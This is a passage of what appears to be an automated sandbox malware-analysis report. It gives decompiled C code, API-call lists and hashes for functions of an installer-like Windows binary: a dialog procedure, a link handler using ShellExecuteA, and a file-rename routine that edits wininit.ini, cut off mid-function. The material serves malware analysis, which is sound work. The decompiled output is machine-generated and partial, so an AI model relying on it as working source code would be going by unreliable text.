                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: FileFindFirst
                                        • String ID:
                                        • API String ID: 1974802433-0
                                        • Opcode ID: 9223db83c99603c3289ccd37b6b2a6db7d53f2a3e2294c42d49ba21f7ea334b2
                                        • Instruction ID: fa0b3d5524a7ec5f3b356c4eb27d29c110ff1bfb4a1b37a6377ddf9626cce4e3
                                        • Opcode Fuzzy Hash: 9223db83c99603c3289ccd37b6b2a6db7d53f2a3e2294c42d49ba21f7ea334b2
                                        • Instruction Fuzzy Hash: EBF0A0B2608110DBE701EBA49E49AEEB768DF52324F60417BE141B20C1D6B84A44DA2A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 028418B1, Relevance: .0, Instructions: 33COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.660079637.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
                                        • Instruction ID: f210945fa1ab53eb5d6914941c42772a2d787359eee64c7f4631c3f57ad89e1e
                                        • Opcode Fuzzy Hash: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
                                        • Instruction Fuzzy Hash: 80014D78A10208EFCB80DF98C584D9DBBF4FB08220F108595E858E7721E730AE50DB40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 02841699, Relevance: .0, Instructions: 10COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.660079637.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                        • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                                        • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                        • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004038BF, Relevance: 46.8, APIs: 31, Instructions: 347windowstringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 77%
                                        			E004038BF(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				signed int _t35;
				struct HWND__* _t37;
				struct HWND__* _t47;
				struct HWND__* _t65;
				struct HWND__* _t71;
				struct HWND__* _t84;
				struct HWND__* _t89;
				struct HWND__* _t97;
				int _t101;
				int _t104;
				struct HWND__* _t117;
				struct HWND__* _t120;
				signed int _t122;
				struct HWND__* _t127;
				long _t132;
				int _t134;
				int _t135;
				struct HWND__* _t136;
				void* _t139;

				_t135 = _a8;
				if(_t135 == 0x110 || _t135 == 0x408) {
					_t33 = _a12;
					_t117 = _a4;
					__eflags = _t135 - 0x110;
					 *0x79f56c = _t33;
					if(_t135 == 0x110) {
						 *0x7a2f84 = _t117;
						 *0x79f57c = GetDlgItem(_t117, 1);
						_t89 = GetDlgItem(_t117, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x79e548 = _t89;
						E00403DA7(_t117);
						SetClassLongA(_t117, 0xfffffff2,  *0x7a2768);
						 *0x7a274c = E00401410(4);
						_t33 = 1;
						__eflags = 1;
						 *0x79f56c = 1;
					}
					_t120 =  *0x409284; // 0xffffffff
					_t132 = (_t120 << 6) +  *0x7a2fa0;
					__eflags = _t120;
					if(_t120 < 0) {
						L38:
						E00403DF3(0x40b);
						while(1) {
							_t35 =  *0x79f56c;
							 *0x409284 =  *0x409284 + _t35;
							_t132 = _t132 + (_t35 << 6);
							_t37 =  *0x409284; // 0xffffffff
							__eflags = _t37 -  *0x7a2fa4;
							if(_t37 ==  *0x7a2fa4) {
								E00401410(1);
							}
							__eflags =  *0x7a274c;
							if( *0x7a274c != 0) {
								break;
							}
							__eflags =  *0x409284 -  *0x7a2fa4; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_push( *((intOrPtr*)(_t132 + 0x24)));
							_t122 =  *(_t132 + 0x14);
							_push(0x7ab000);
							E004059E1(_t117, _t122, _t132);
							_push( *((intOrPtr*)(_t132 + 0x20)));
							_push(0xfffffc19);
							E00403DA7(_t117);
							_push( *((intOrPtr*)(_t132 + 0x1c)));
							_push(0xfffffc1b);
							E00403DA7(_t117);
							_push( *((intOrPtr*)(_t132 + 0x28)));
							_push(0xfffffc1a);
							E00403DA7(_t117);
							_t47 = GetDlgItem(_t117, 3);
							__eflags =  *0x7a300c;
							_t136 = _t47;
							if( *0x7a300c != 0) {
								_t122 = _t122 & 0x0000fefd | 0x00000004;
								__eflags = _t122;
							}
							ShowWindow(_t136, _t122 & 0x00000008);
							EnableWindow(_t136, _t122 & 0x00000100);
							E00403DC9(_t122 & 0x00000002);
							EnableWindow( *0x79e548, _t122 & 0x00000004);
							SendMessageA(_t136, 0xf4, 0, 1);
							__eflags =  *0x7a300c;
							if( *0x7a300c == 0) {
								_push( *0x79f57c);
							} else {
								SendMessageA(_t117, 0x401, 2, 0);
								_push( *0x79e548);
							}
							E00403DDC();
							E004059BF(0x79f580, 0x7a2780);
							_push( *((intOrPtr*)(_t132 + 0x18)));
							_push( &(0x79f580[lstrlenA(0x79f580)]));
							E004059E1(_t117, 0, _t132);
							SetWindowTextA(_t117, 0x79f580);
							_push(0);
							_t65 = E0040136D( *((intOrPtr*)(_t132 + 8)));
							__eflags = _t65;
							if(_t65 != 0) {
								continue;
							} else {
								__eflags =  *_t132 - _t65;
								if( *_t132 == _t65) {
									continue;
								}
								__eflags =  *(_t132 + 4) - 5;
								if( *(_t132 + 4) != 5) {
									DestroyWindow( *0x7a2758);
									 *0x79ed58 = _t132;
									__eflags =  *_t132;
									if( *_t132 > 0) {
										_t71 = CreateDialogParamA( *0x7a2f80,  *_t132 +  *0x7a2760 & 0x0000ffff, _t117,  *(0x409288 +  *(_t132 + 4) * 4), _t132);
										__eflags = _t71;
										 *0x7a2758 = _t71;
										if(_t71 != 0) {
											_push( *((intOrPtr*)(_t132 + 0x2c)));
											_push(6);
											E00403DA7(_t71);
											GetWindowRect(GetDlgItem(_t117, 0x3fa), _t139 + 0x10);
											ScreenToClient(_t117, _t139 + 0x10);
											SetWindowPos( *0x7a2758, 0,  *(_t139 + 0x20),  *(_t139 + 0x20), 0, 0, 0x15);
											_push(0);
											E0040136D( *((intOrPtr*)(_t132 + 0xc)));
											ShowWindow( *0x7a2758, 8);
											E00403DF3(0x405);
										}
									}
									goto L58;
								}
								__eflags =  *0x7a300c - _t65;
								if( *0x7a300c != _t65) {
									goto L61;
								}
								__eflags =  *0x7a3000 - _t65;
								if( *0x7a3000 != _t65) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x7a2758);
						 *0x7a2f84 =  *0x7a2f84 & 0x00000000;
						__eflags =  *0x7a2f84;
						EndDialog(_t117,  *0x79e950);
						goto L58;
					} else {
						__eflags = _t33 - 1;
						if(_t33 != 1) {
							L37:
							__eflags =  *_t132;
							if( *_t132 == 0) {
								goto L61;
							}
							goto L38;
						}
						_push(0);
						_t84 = E0040136D( *((intOrPtr*)(_t132 + 0x10)));
						__eflags = _t84;
						if(_t84 == 0) {
							goto L37;
						}
						SendMessageA( *0x7a2758, 0x40f, 0, 1);
						__eflags =  *0x7a274c;
						return 0 |  *0x7a274c == 0x00000000;
					}
				} else {
					_t117 = _a4;
					if(_t135 == 0x47) {
						SetWindowPos( *0x79f560, _t117, 0, 0, 0, 0, 0x13);
					}
					if(_t135 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x79f560,  ~(_a12 - 1) & _t135);
					}
					if(_t135 != 0x40d) {
						__eflags = _t135 - 0x11;
						if(_t135 != 0x11) {
							__eflags = _t135 - 0x10;
							if(_t135 != 0x10) {
								L14:
								__eflags = _t135 - 0x111;
								if(_t135 != 0x111) {
									L30:
									return E00403E0E(_t135, _a12, _a16);
								}
								_t134 = _a12 & 0x0000ffff;
								_t127 = GetDlgItem(_t117, _t134);
								__eflags = _t127;
								if(_t127 == 0) {
									L17:
									__eflags = _t134 - 1;
									if(_t134 != 1) {
										__eflags = _t134 - 3;
										if(_t134 != 3) {
											__eflags = _t134 - 2;
											if(_t134 != 2) {
												L29:
												SendMessageA( *0x7a2758, 0x111, _a12, _a16);
												goto L30;
											}
											__eflags =  *0x7a300c;
											if( *0x7a300c == 0) {
												_t97 = E00401410(3);
												__eflags = _t97;
												if(_t97 != 0) {
													goto L30;
												}
												 *0x79e950 = 1;
												L25:
												_push(0x78);
												L26:
												E00403D80();
												goto L30;
											}
											E00401410(_t134);
											 *0x79e950 = _t134;
											goto L25;
										}
										__eflags =  *0x409284;
										if( *0x409284 <= 0) {
											goto L29;
										}
										_push(0xffffffff);
										goto L26;
									}
									_push(1);
									goto L26;
								}
								SendMessageA(_t127, 0xf3, 0, 0);
								_t101 = IsWindowEnabled(_t127);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L61;
								}
								goto L17;
							}
							__eflags =  *0x409284 -  *0x7a2fa4 - 1; // 0xffffffff
							if(__eflags != 0) {
								goto L30;
							}
							_t104 = IsWindowEnabled( *0x79e548);
							__eflags = _t104;
							if(_t104 != 0) {
								goto L30;
							}
							_t135 = 0x111;
							_a12 = 1;
							goto L14;
						}
						SetWindowLongA(_t117, 0, 0);
						return 1;
					} else {
						DestroyWindow( *0x7a2758);
						 *0x7a2758 = _a12;
						L58:
						if( *0x7a0580 == 0 &&  *0x7a2758 != 0) {
							ShowWindow(_t117, 0xa);
							 *0x7a0580 = 1;
						}
						L61:
						return 0;
					}
				}
			}




























                                        0x004038c9
                                        0x004038d1
                                        0x00403a4a
                                        0x00403a4e
                                        0x00403a52
                                        0x00403a54
                                        0x00403a59
                                        0x00403a64
                                        0x00403a6f
                                        0x00403a74
                                        0x00403a76
                                        0x00403a78
                                        0x00403a7b
                                        0x00403a80
                                        0x00403a8e
                                        0x00403a9b
                                        0x00403aa2
                                        0x00403aa2
                                        0x00403aa3
                                        0x00403aa3
                                        0x00403aa8
                                        0x00403ab5
                                        0x00403abb
                                        0x00403abd
                                        0x00403afd
                                        0x00403b02
                                        0x00403b07
                                        0x00403b07
                                        0x00403b0c
                                        0x00403b15
                                        0x00403b17
                                        0x00403b1c
                                        0x00403b22
                                        0x00403b26
                                        0x00403b26
                                        0x00403b2b
                                        0x00403b32
                                        0x00000000
                                        0x00000000
                                        0x00403b3d
                                        0x00403b43
                                        0x00000000
                                        0x00000000
                                        0x00403b49
                                        0x00403b4c
                                        0x00403b4f
                                        0x00403b54
                                        0x00403b59
                                        0x00403b5c
                                        0x00403b62
                                        0x00403b67
                                        0x00403b6a
                                        0x00403b70
                                        0x00403b75
                                        0x00403b78
                                        0x00403b7e
                                        0x00403b86
                                        0x00403b8c
                                        0x00403b93
                                        0x00403b95
                                        0x00403b9c
                                        0x00403b9c
                                        0x00403b9c
                                        0x00403ba6
                                        0x00403bb5
                                        0x00403bc1
                                        0x00403bd0
                                        0x00403be7
                                        0x00403be9
                                        0x00403bef
                                        0x00403c04
                                        0x00403bf1
                                        0x00403bfa
                                        0x00403bfc
                                        0x00403bfc
                                        0x00403c0a
                                        0x00403c1a
                                        0x00403c1f
                                        0x00403c2a
                                        0x00403c2b
                                        0x00403c32
                                        0x00403c38
                                        0x00403c3c
                                        0x00403c41
                                        0x00403c43
                                        0x00000000
                                        0x00403c49
                                        0x00403c49
                                        0x00403c4b
                                        0x00000000
                                        0x00000000
                                        0x00403c51
                                        0x00403c55
                                        0x00403c7a
                                        0x00403c80
                                        0x00403c86
                                        0x00403c89
                                        0x00403caf
                                        0x00403cb5
                                        0x00403cb7
                                        0x00403cbc
                                        0x00403cc2
                                        0x00403cc5
                                        0x00403cc8
                                        0x00403cdf
                                        0x00403ceb
                                        0x00403d06
                                        0x00403d0c
                                        0x00403d10
                                        0x00403d1d
                                        0x00403d28
                                        0x00403d28
                                        0x00403cbc
                                        0x00000000
                                        0x00403c89
                                        0x00403c57
                                        0x00403c5d
                                        0x00000000
                                        0x00000000
                                        0x00403c63
                                        0x00403c69
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00403c6f
                                        0x00403c43
                                        0x00403d35
                                        0x00403d41
                                        0x00403d41
                                        0x00403d49
                                        0x00000000
                                        0x00403abf
                                        0x00403abf
                                        0x00403ac2
                                        0x00403af5
                                        0x00403af5
                                        0x00403af7
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00403af7
                                        0x00403ac4
                                        0x00403ac8
                                        0x00403acd
                                        0x00403acf
                                        0x00000000
                                        0x00000000
                                        0x00403adf
                                        0x00403ae7
                                        0x00000000
                                        0x00403aed
                                        0x004038e3
                                        0x004038e3
                                        0x004038ea
                                        0x004038fb
                                        0x004038fb
                                        0x00403904
                                        0x0040390d
                                        0x00403918
                                        0x00403918
                                        0x00403924
                                        0x00403940
                                        0x00403943
                                        0x00403958
                                        0x0040395b
                                        0x00403990
                                        0x00403990
                                        0x00403996
                                        0x00403a37
                                        0x00000000
                                        0x00403a40
                                        0x0040399c
                                        0x004039af
                                        0x004039b1
                                        0x004039b3
                                        0x004039d0
                                        0x004039d3
                                        0x004039d5
                                        0x004039da
                                        0x004039dd
                                        0x004039ec
                                        0x004039ef
                                        0x00403a22
                                        0x00403a35
                                        0x00000000
                                        0x00403a35
                                        0x004039f1
                                        0x004039f8
                                        0x00403a11
                                        0x00403a16
                                        0x00403a18
                                        0x00000000
                                        0x00000000
                                        0x00403a1a
                                        0x00403a06
                                        0x00403a06
                                        0x00403a08
                                        0x00403a08
                                        0x00000000
                                        0x00403a08
                                        0x004039fb
                                        0x00403a00
                                        0x00000000
                                        0x00403a00
                                        0x004039df
                                        0x004039e6
                                        0x00000000
                                        0x00000000
                                        0x004039e8
                                        0x00000000
                                        0x004039e8
                                        0x004039d7
                                        0x00000000
                                        0x004039d7
                                        0x004039bf
                                        0x004039c2
                                        0x004039c8
                                        0x004039ca
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x004039ca
                                        0x00403963
                                        0x00403969
                                        0x00000000
                                        0x00000000
                                        0x00403975
                                        0x0040397b
                                        0x0040397d
                                        0x00000000
                                        0x00000000
                                        0x00403983
                                        0x00403988
                                        0x00000000
                                        0x00403988
                                        0x0040394a
                                        0x00000000
                                        0x00403926
                                        0x0040392c
                                        0x00403936
                                        0x00403d4f
                                        0x00403d56
                                        0x00403d64
                                        0x00403d6a
                                        0x00403d6a
                                        0x00403d74
                                        0x00000000
                                        0x00403d74
                                        0x00403924

                                        APIs
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004038FB
                                        • ShowWindow.USER32(?), ref: 00403918
                                        • DestroyWindow.USER32 ref: 0040392C
                                        • SetWindowLongA.USER32 ref: 0040394A
                                        • IsWindowEnabled.USER32 ref: 00403975
                                        • GetDlgItem.USER32 ref: 004039A3
                                        • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 004039BF
                                        • IsWindowEnabled.USER32(00000000), ref: 004039C2
                                        • GetDlgItem.USER32 ref: 00403A6A
                                        • GetDlgItem.USER32 ref: 00403A74
                                        • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403A8E
                                        • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403ADF
                                        • GetDlgItem.USER32 ref: 00403B86
                                        • ShowWindow.USER32(00000000,?), ref: 00403BA6
                                        • EnableWindow.USER32(00000000,?), ref: 00403BB5
                                        • EnableWindow.USER32(?,?), ref: 00403BD0
                                        • SendMessageA.USER32(00000000,000000F4,00000000,00000001), ref: 00403BE7
                                        • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403BFA
                                        • lstrlenA.KERNEL32(0079F580,?,0079F580,007A2780), ref: 00403C23
                                        • SetWindowTextA.USER32(?,0079F580), ref: 00403C32
                                        • ShowWindow.USER32(?,0000000A), ref: 00403D64
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: Window$ItemMessageSend$Show$EnableEnabledLong$ClassDestroyTextlstrlen
                                        • String ID:
                                        • API String ID: 3950083612-0
                                        • Opcode ID: fa4e3fe4f8128de32ab5ebeb5ac9453328a33fd8f116c2f1de342d397e391704
                                        • Instruction ID: 5dd3c4f218cf3e404d6a97a2e5ce8d1cdd0b8388a563f9de6f37f2f8e87629b5
                                        • Opcode Fuzzy Hash: fa4e3fe4f8128de32ab5ebeb5ac9453328a33fd8f116c2f1de342d397e391704
                                        • Instruction Fuzzy Hash: 9DC1CC70904200AFD720AF25ED45E277FADEB89706F00453AF641B52F2D67DAA42CB1D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00403EEF, Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 204windowstringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 92%
                                        			E00403EEF(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char* _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x79f568 =  *0x79f568 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403E0E(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x7a1f20;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x7a2f84, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x7a2f84, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x79f568 != 0) {
						goto L25;
					} else {
						_t112 =  *0x79ed58 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403DC9(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E0040417A();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t113 =  *( *0x7a275c - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x7a2fb8;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403EBB;
				E00403DA7(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403DA7(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403DC9( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403DDC(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x7a2f88 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x79e54c =  *0x79e54c & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x79f568 =  *0x79f568 & 0x00000000;
				return 0;
			}

















                                        0x00403eff
                                        0x00404025
                                        0x00404081
                                        0x00404085
                                        0x0040415c
                                        0x0040415e
                                        0x0040415e
                                        0x00404164
                                        0x00404164
                                        0x00404167
                                        0x00000000
                                        0x0040416e
                                        0x00404093
                                        0x00404095
                                        0x0040409f
                                        0x004040aa
                                        0x004040ad
                                        0x004040b0
                                        0x004040bb
                                        0x004040be
                                        0x004040c5
                                        0x004040d3
                                        0x004040eb
                                        0x004040fe
                                        0x0040410e
                                        0x00404110
                                        0x00404110
                                        0x004040c5
                                        0x0040411a
                                        0x00000000
                                        0x00404125
                                        0x00404129
                                        0x0040413a
                                        0x0040413a
                                        0x00404140
                                        0x0040414e
                                        0x0040414e
                                        0x00000000
                                        0x00404152
                                        0x0040411a
                                        0x00404030
                                        0x00000000
                                        0x00404044
                                        0x0040404a
                                        0x00404050
                                        0x00000000
                                        0x00000000
                                        0x00404075
                                        0x00404077
                                        0x0040407c
                                        0x00000000
                                        0x0040407c
                                        0x00404030
                                        0x00403f05
                                        0x00403f08
                                        0x00403f0d
                                        0x00403f1e
                                        0x00403f1e
                                        0x00403f25
                                        0x00403f28
                                        0x00403f2a
                                        0x00403f2f
                                        0x00403f38
                                        0x00403f3e
                                        0x00403f4a
                                        0x00403f4d
                                        0x00403f56
                                        0x00403f5b
                                        0x00403f5e
                                        0x00403f63
                                        0x00403f7a
                                        0x00403f81
                                        0x00403f94
                                        0x00403f97
                                        0x00403fac
                                        0x00403fb3
                                        0x00403fb8
                                        0x00403fbd
                                        0x00403fbd
                                        0x00403fcc
                                        0x00403fdb
                                        0x00403fdd
                                        0x00403ff3
                                        0x00404002
                                        0x00404004
                                        0x00000000

                                        APIs
                                        • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00403F7A
                                        • GetDlgItem.USER32 ref: 00403F8E
                                        • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00403FAC
                                        • GetSysColor.USER32(?), ref: 00403FBD
                                        • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00403FCC
                                        • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00403FDB
                                        • lstrlenA.KERNEL32(?), ref: 00403FE5
                                        • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00403FF3
                                        • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404002
                                        • GetDlgItem.USER32 ref: 00404065
                                        • SendMessageA.USER32(00000000), ref: 00404068
                                        • GetDlgItem.USER32 ref: 00404093
                                        • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004040D3
                                        • LoadCursorA.USER32 ref: 004040E2
                                        • SetCursor.USER32(00000000), ref: 004040EB
                                        • ShellExecuteA.SHELL32(0000070B,open,007A1F20,00000000,00000000,00000001), ref: 004040FE
                                        • LoadCursorA.USER32 ref: 0040410B
                                        • SetCursor.USER32(00000000), ref: 0040410E
                                        • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040413A
                                        • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040414E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                        • String ID: N$open
                                        • API String ID: 3615053054-904208323
                                        • Opcode ID: f57dfcbcc2afe5e5f36277ccc321ea508118caa9513741def9589acdf25ed01d
                                        • Instruction ID: 2049aa6b61ecefec59fc3e575142d3045787f4aa2f6754ef1ed68d4f44ea64a4
                                        • Opcode Fuzzy Hash: f57dfcbcc2afe5e5f36277ccc321ea508118caa9513741def9589acdf25ed01d
                                        • Instruction Fuzzy Hash: 7C61A171A40309BFEB109F60CC45F6A7B69EB94715F108026FB01BA2D1C7B8E991CF99
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00405707, Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 151filememorystringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 94%
                                        			E00405707(long _a4, long _a16) {
				CHAR* _v0;
				intOrPtr* _t13;
				long _t14;
				int _t19;
				void* _t27;
				long _t28;
				intOrPtr* _t36;
				int _t42;
				intOrPtr* _t43;
				long _t48;
				CHAR* _t50;
				void* _t52;
				void* _t54;

				_t13 = E00405CD2("KERNEL32.dll", "MoveFileExA");
				_t50 = _v0;
				if(_t13 != 0) {
					_t19 =  *_t13(_a4, _t50, 5);
					if(_t19 != 0) {
						L16:
						 *0x7a3010 =  *0x7a3010 + 1;
						return _t19;
					}
				}
				 *0x7a1710 = 0x4c554e;
				if(_t50 == 0) {
					L5:
					_t14 = GetShortPathNameA(_a4, 0x7a1188, 0x400);
					if(_t14 != 0 && _t14 <= 0x400) {
						_t42 = wsprintfA(0x7a0d88, "%s=%s\r\n", 0x7a1710, 0x7a1188);
						GetWindowsDirectoryA(0x7a1188, 0x3f0);
						lstrcatA(0x7a1188, "\\wininit.ini");
						_t19 = CreateFileA(0x7a1188, 0xc0000000, 0, 0, 4, 0x8000080, 0);
						_t54 = _t19;
						if(_t54 == 0xffffffff) {
							goto L16;
						}
						_t48 = GetFileSize(_t54, 0);
						_t5 = _t42 + 0xa; // 0xa
						_t52 = GlobalAlloc(0x40, _t48 + _t5);
						if(_t52 == 0 || ReadFile(_t54, _t52, _t48,  &_a16, 0) == 0 || _t48 != _a16) {
							L15:
							_t19 = CloseHandle(_t54);
							goto L16;
						} else {
							if(E00405624(_t52, "[Rename]\r\n") != 0) {
								_t27 = E00405624(_t25 + 0xa, "\n[");
								if(_t27 == 0) {
									L13:
									_t28 = _t48;
									L14:
									E00405670(_t52 + _t28, 0x7a0d88, _t42);
									SetFilePointer(_t54, 0, 0, 0);
									WriteFile(_t54, _t52, _t48 + _t42,  &_a4, 0);
									GlobalFree(_t52);
									goto L15;
								}
								_t36 = _t27 + 1;
								_t43 = _t36;
								if(_t36 >= _t52 + _t48) {
									L21:
									_t28 = _t36 - _t52;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t42)) =  *_t43;
									_t43 = _t43 + 1;
								} while (_t43 < _t52 + _t48);
								goto L21;
							}
							E004059BF(_t52 + _t48, "[Rename]\r\n");
							_t48 = _t48 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E00405690(_t50, 0, 1));
